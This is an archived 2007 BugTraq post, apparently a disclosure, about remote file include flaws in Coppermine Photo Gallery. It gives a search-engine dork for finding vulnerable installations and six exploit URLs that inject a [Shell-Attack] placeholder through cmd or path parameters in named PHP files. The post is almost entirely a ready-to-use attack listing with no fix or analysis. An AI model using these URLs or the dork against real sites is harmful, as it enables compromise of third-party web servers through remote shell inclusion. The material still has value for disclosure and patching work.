BugTraq
Remote File Include In Script Coppermine Photo Gallery Mar 09 2007 03:13PM
RaeD Hasadya (raed bsdmail com)
By Hasadya Raed
Contact : RaeD (at) BsdMail (dot) Com [email concealed]
------------------------------------
Script : Coppermine Photo Gallery
Expl : Remote Include File
Dork : "Copyright (c) 2003-2006 Coppermine Dev Team"
------------------------------------
B.Files :
image_processor.php
functions.php
picmgmt.inc.php
plugin_api.inc.php
index.php

Exploits :

http://www.Victim.Com/Script_Path/image_processor.php?cmd=[Shell-Attack]

http://www.Victim.Com/Script_Path/include/functions.php?path=[Shell-Atta
ck]
http://www.Victim.Com/Script_Path/include/picmgmt.inc.php?cmd=[Shell-Att
ack]
http://www.Victim.Com/Script_Path/include/plugin_api.inc.php?path=[Shell
-Attack]
http://www.Victim.Com/Script_Path/index.php?path=[Shell-Attack]
http://www.Victim.Com/Script_Path/pluginmgr.php?path=[Shell-Attack]

----------------------------------------

By Hasadya Raed

--
_______________________________________________
Get your free email from http://bsdmail.com

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus